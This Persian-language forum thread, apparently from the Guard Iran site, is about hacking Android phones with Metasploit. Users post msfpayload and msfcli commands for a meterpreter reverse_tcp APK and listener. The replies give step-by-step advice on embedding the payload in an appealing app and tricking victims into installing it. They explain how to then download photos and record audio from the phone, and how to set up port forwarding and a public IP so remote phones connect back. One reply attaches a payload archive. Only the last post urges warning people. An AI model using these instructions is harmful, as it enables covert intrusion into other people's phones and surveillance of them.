رفتن به مطلب
  • Black
  • Blueberry
  • Slate
  • Blackcurrant
  • Watermelon
  • Strawberry
  • Orange
  • Banana
  • Apple
  • Emerald
  • Chocolate
  • Charcoal

عضویت ویژه طلایی گارد ایران با تخفیف 50%

برای عضویت کلیک کنید

پست های پیشنهاد شده

در در 1394/08/18, 13:45:15، tieun گفته است :

درود

دوستان تا اونجا که من هم اطلاع دارم هک اندروید با متااسپلویت کالی دقیقا فقط برای دیوایس هایی هستند که بصورت مشترک به یه وای فا یا وای فا شما وصلند

اگه اشتباه نکنم خوده مدیر بازنشسته demon عزیز هم اموزش داده بودند و منم در یه سایتی اموزششو خونده بودم

حالا بازم شاید من اشتباه میکنم با عرض پوزش از اساتید محترم

نخیر دوست عزیز کسایی ک به وای فای شما هم وصل نباشن رو میتونین بهش نفوذ کنین حتی اونایی ک بستهای همراه هم دارن

به اشتراک گذاری این ارسال


لینک به ارسال
به اشتراک گذاری در سایت های دیگر
در در 1394/08/17, 17:57:54، aliakbar1378121 گفته است :

سلام

این کد رو منوتو هر سایتی دیدم یا تو یوتیوب دیدم برای هک اندروید بود

msfpayload android/meterpreter/reverse_tcp LHOST=192.168.0.6 LPORT=4444 R >a.apk

و برای دریافتش 

msfcli exploit/multi/handler PAYLOAD=android/meterpreter/reverse_tcp LHOST=192.168.0.6 LPORT=4444 E

این کد تو همه بودش

اما مشکلی که من دارم اینه که با این برنامه که ساخته میشه فقط کسایی که به وایفای من وصلن رو میشه هک کرد

من هر راهی امتحان کردم نشدش کسایی که به وای فای من وصل نیستن و از من دور هستند رو هک کنم

لطفا یه کمکی کنید. سر ابرو هستش.خخخخخخخخ

سلام. امیدوارم معنای امنیت رو در حقیقت خود کلمه حس کنید.

برای اینکه بتونید چنین کاری بکنید هم از payload پیوست استفاده کنید.

بعد اینم در نظر بگیرید که هک هر قربانی تا حدودی نیاز به مهندس اجتماعی هم داره. شما رفتار کاربر رو بسنجید و ببینید اهل چه نرم افزارهایی هستش. ببین از چه نرم افزاری خوشش میاد؟ شاید از آشپزی خوشش اومد شایدم از کیف پول و یا شاید نرم افزار محاسبه متراژ متر مربع. (سعی کن یه برنامه پولی که مطمئنی رو گوشیش نصب نکرده رو پیدا کنی)

از اونجا که از اسم فایل معلوم هست (apk-embed-payload) یعنی اینکه برنامه میاد payload رو با خودش حمل میکنه ، signature نرم افزار تغییر میکنه. کاربر به راحتی نمیتونه signature نرم افزار رو شناسایی کنه مگر اینکه نسخه جدید برنامه رو بگیره و توی نصب دچار مشکل بشه.

حالا بعد از اینکه payload رو به نرم افزار تزریق کردی (که مطمئنا فیلم آموزشیش گیرت میاد) فایل رو آماده ارسال بکن و بگو که خیلی برنامه خوبیه و اینا.

از این به بعد موقعیت قربانی مهمه. اگر با هم توی یه شبکه هستین (مثل وای فای خونه و یا یه جایی که به یه مودم وصل بشید خیلی خوبه)  ولی اگر از راه دور باشه با محدودیت مواجه هستی. فرض میکنیم توی یه شبکه هستین. در زمان تعریف LHOST آی پی خودت رو بده. فایل رو بساز. متااسپلویت رو بیار بالا. exploit رو اجرا کن، مشخصات ای پی و پورت خودت رو بهش بده و استارت کن تا اکسپلویت بره روی حالت Listen و منتظر اتصال باشه...

به اینجا که رسیدی برنامه رو برای قربانی به هر شکلی شده بفرست و سعی کن نصبش بکنه. یا گولش بزن یا خودت نصب کن. وقتی که نصب کرد خود payload به ای پی تعریف شده وصل میشه و تو دیگه گوشی تو دستته. دیگه میتونی عکساشو یکی یکی دانلود کنی و یا اینکه به میکروفونش بگی فلان ثانیه صدا ضبط کنه یا ...

حالا فرض میکنیم طرف توی نت شما نیست. اینجا تو باید اون دستگاه رو از طریق Ip valid وصل کنی به سیستم خودت. خب چجوری؟ این نیاز به port forward داره. اگر پورت توی payload رو مثلا 4444 معرفی کردی، به مودم هم باید بگی که در صورت ورود هرگونه درخواست برای پورت 4444، بفرستش پیش من. ضمنا برای وارد کردن ای پی باید از جایی که نت میگیری باید بهشون بگی برات آی پی ولید وصل کنن تا مستقیم وصل شه به مودمت. فکر کنم هر سه ماه 6000 تومن باشه. اینطوریه که موبایل با ای پی xxx.xxx.xxx.xxx میتونه به آی پی شما به آدرس xxx.xxx.xxx.xxx اطلاعات بفرسته و مستقیم برسه به مودمت و از اونجا مستقیم بیاد برای سیستم.

 

موفق باشی.

a62d106b55562cc1ab88-0b9cf04487a6b1f360f63e4cf1fecec64d429624.zip

به اشتراک گذاری این ارسال


لینک به ارسال
به اشتراک گذاری در سایت های دیگر
در در 1394/08/17, 17:57:54، aliakbar1378121 گفته است :

سلام

این کد رو منوتو هر سایتی دیدم یا تو یوتیوب دیدم برای هک اندروید بود

msfpayload android/meterpreter/reverse_tcp LHOST=192.168.0.6 LPORT=4444 R >a.apk

و برای دریافتش 

msfcli exploit/multi/handler PAYLOAD=android/meterpreter/reverse_tcp LHOST=192.168.0.6 LPORT=4444 E

این کد تو همه بودش

اما مشکلی که من دارم اینه که با این برنامه که ساخته میشه فقط کسایی که به وایفای من وصلن رو میشه هک کرد

من هر راهی امتحان کردم نشدش کسایی که به وای فای من وصل نیستن و از من دور هستند رو هک کنم

لطفا یه کمکی کنید. سر ابرو هستش.خخخخخخخخ

سلام

دوست عزیز دوستان درست میگن

من هم قبلا خیلی سر این موضوع وقت گذاشتم ، ولی همینطور که گفتن این روش فقط  برای افراد متصل به مودم هست

به اشتراک گذاری این ارسال


لینک به ارسال
به اشتراک گذاری در سایت های دیگر
در 4 ساعت قبل، Worst_board گفته است :

سلام

دوست عزیز دوستان درست میگن

من هم قبلا خیلی سر این موضوع وقت گذاشتم ، ولی همینطور که گفتن این روش فقط  برای افراد متصل به مودم هست

سلام

دوست عزیز اگر مطالب قبلی رو خونده باشید و کمی هم توجه کرده باشید میبینید که توی آدرس دهی شما یه آدرس رو به کد میدید و میگید وقتی که روی این گوشی نصب شدی، یه سری اطلاعات رو به اتاق بغلی بفرست.

کد میره روی دستگاه قربانی نصب میشه اما آدرسی که بهش دادید رو توی شبکه وای فای پیدا میکنه اما کسی که بیرون هست رو پیدا نمیکنه چرا؟ چونکه شما ادرس اتاق بغلی رو بهش دادید اما کد بیرون از شهر هست. برای اینکه بتونه شما رو پیدا کنه باید آدرس کدپستی ساختمون رو بهش بدید ، به نگهبانی ساختمون بگید که هر وقت فلان بسته اومد بیارش واحد ما.

این تفاسیر توی شبکه چجوری هست؟ به این شرح:

1- شما یه آی پی پابلیک دارید که باید به کد معرفی کنید تا وقتی میفرستید برای یکی دیگه بتونه به آی پی شما در سرتاسر اینترنت دسترسی پیدا بکنه

2-بعد به مودم خودتون که دارای آی پی پابلیک هست از طریق port forwarding بگید که هر وقت از طریق پورت 4444 بسته ای رو دریافت کردی پس نده، بفرستش به آی پی داخلی به شماره مثلا 192.168.0.2

3- اینجوریه که هروقت طرف کد روی گوشیش نصب بشه بصورت منطقی توی شبکه میتونه شما رو پیدا کنه و فرمان بگیره.

موفق و موید

به اشتراک گذاری این ارسال


لینک به ارسال
به اشتراک گذاری در سایت های دیگر

با سلام من جواب تمام دوستان رو خوندم و جواب رو پیدا نکردم گفتم یه توضیح بدم

خوب اول باید بگم بله این پیلود ها برای روتور شما جواب میده

خوب راه حل چیست ؟ چند عکس میزارم امید وارم متوجه شید به زودی قول میدم آموزش هک تمام اندروید های متصل به نت رو بزارم

5a1a17183ca5f_Screenshotfrom2017-11-2519-13-11.thumb.png.469372144cc1d714a76b8274b7e75753.png

5a1a1715428d4_Screenshotfrom2017-11-2519-13-17.thumb.png.dbb71dfef3a67c21886c37d329ef9d91.png

 

 

5a1a170d4baf9_Screenshotfrom2017-11-2519-14-06.thumb.png.ea3d7a11746a12dd12912edf9dcab4be.png

 

5a1a17069854b_Screenshotfrom2017-11-2519-15-33.thumb.png.3fa1fd4b21a40b32e87652aa918bd2da.png

 

به اشتراک گذاری این ارسال


لینک به ارسال
به اشتراک گذاری در سایت های دیگر

 

موقع ساخت پیلود باید ای پی ولید رو بدید همون ای پی پابلیک ولی موقعی که اکسپلویت راه افتاده ای پی لوکال یا محلی رو باید بدید ضمنا باید حتما یه پورتی برای این کانال ارتباطی داخل مودم تعریف کنید تا پکت ها بتونن رد و بدل بشن 

 

حالا واقعا سود اینکارا چیه ؟ بهتره بجاش مردمو اگاه کنیم که هر برنامه ای نصب نکنن هر چیزیو باور نکنن .

 

به اشتراک گذاری این ارسال


لینک به ارسال
به اشتراک گذاری در سایت های دیگر

برای ارسال دیدگاه یک حساب کاربری ایجاد کنید یا وارد حساب خود شوید

برای اینکه بتوانید دیدگاهی ارسال کنید نیاز دارید که کاربر سایت شوید

ایجاد یک حساب کاربری

برای حساب کاربری جدید در سایت ما ثبت نام کنید. عضویت خیلی ساده است !

ثبت نام یک حساب کاربری جدید

ورود به حساب کاربری

دارای حساب کاربری هستید؟ از اینجا وارد شوید

ورود به حساب کاربری

درباره ی ما

تیم امنیتی گارد ایران یک گروه مستقل است که قوانین آن با خط مشی جمهوری اسلامی ایران مغایرت ندارد. تیم امنیتی گارد ایران از سال 1393 فعالیت خود را آغاز کرد و هدف این تیم تامین امنیت سایت ها و سرورهای ایرانی است. تیم ما همیشه برای دفاع از مرزهای سایبری سرزمین عزیزمان ایران آماده است.
×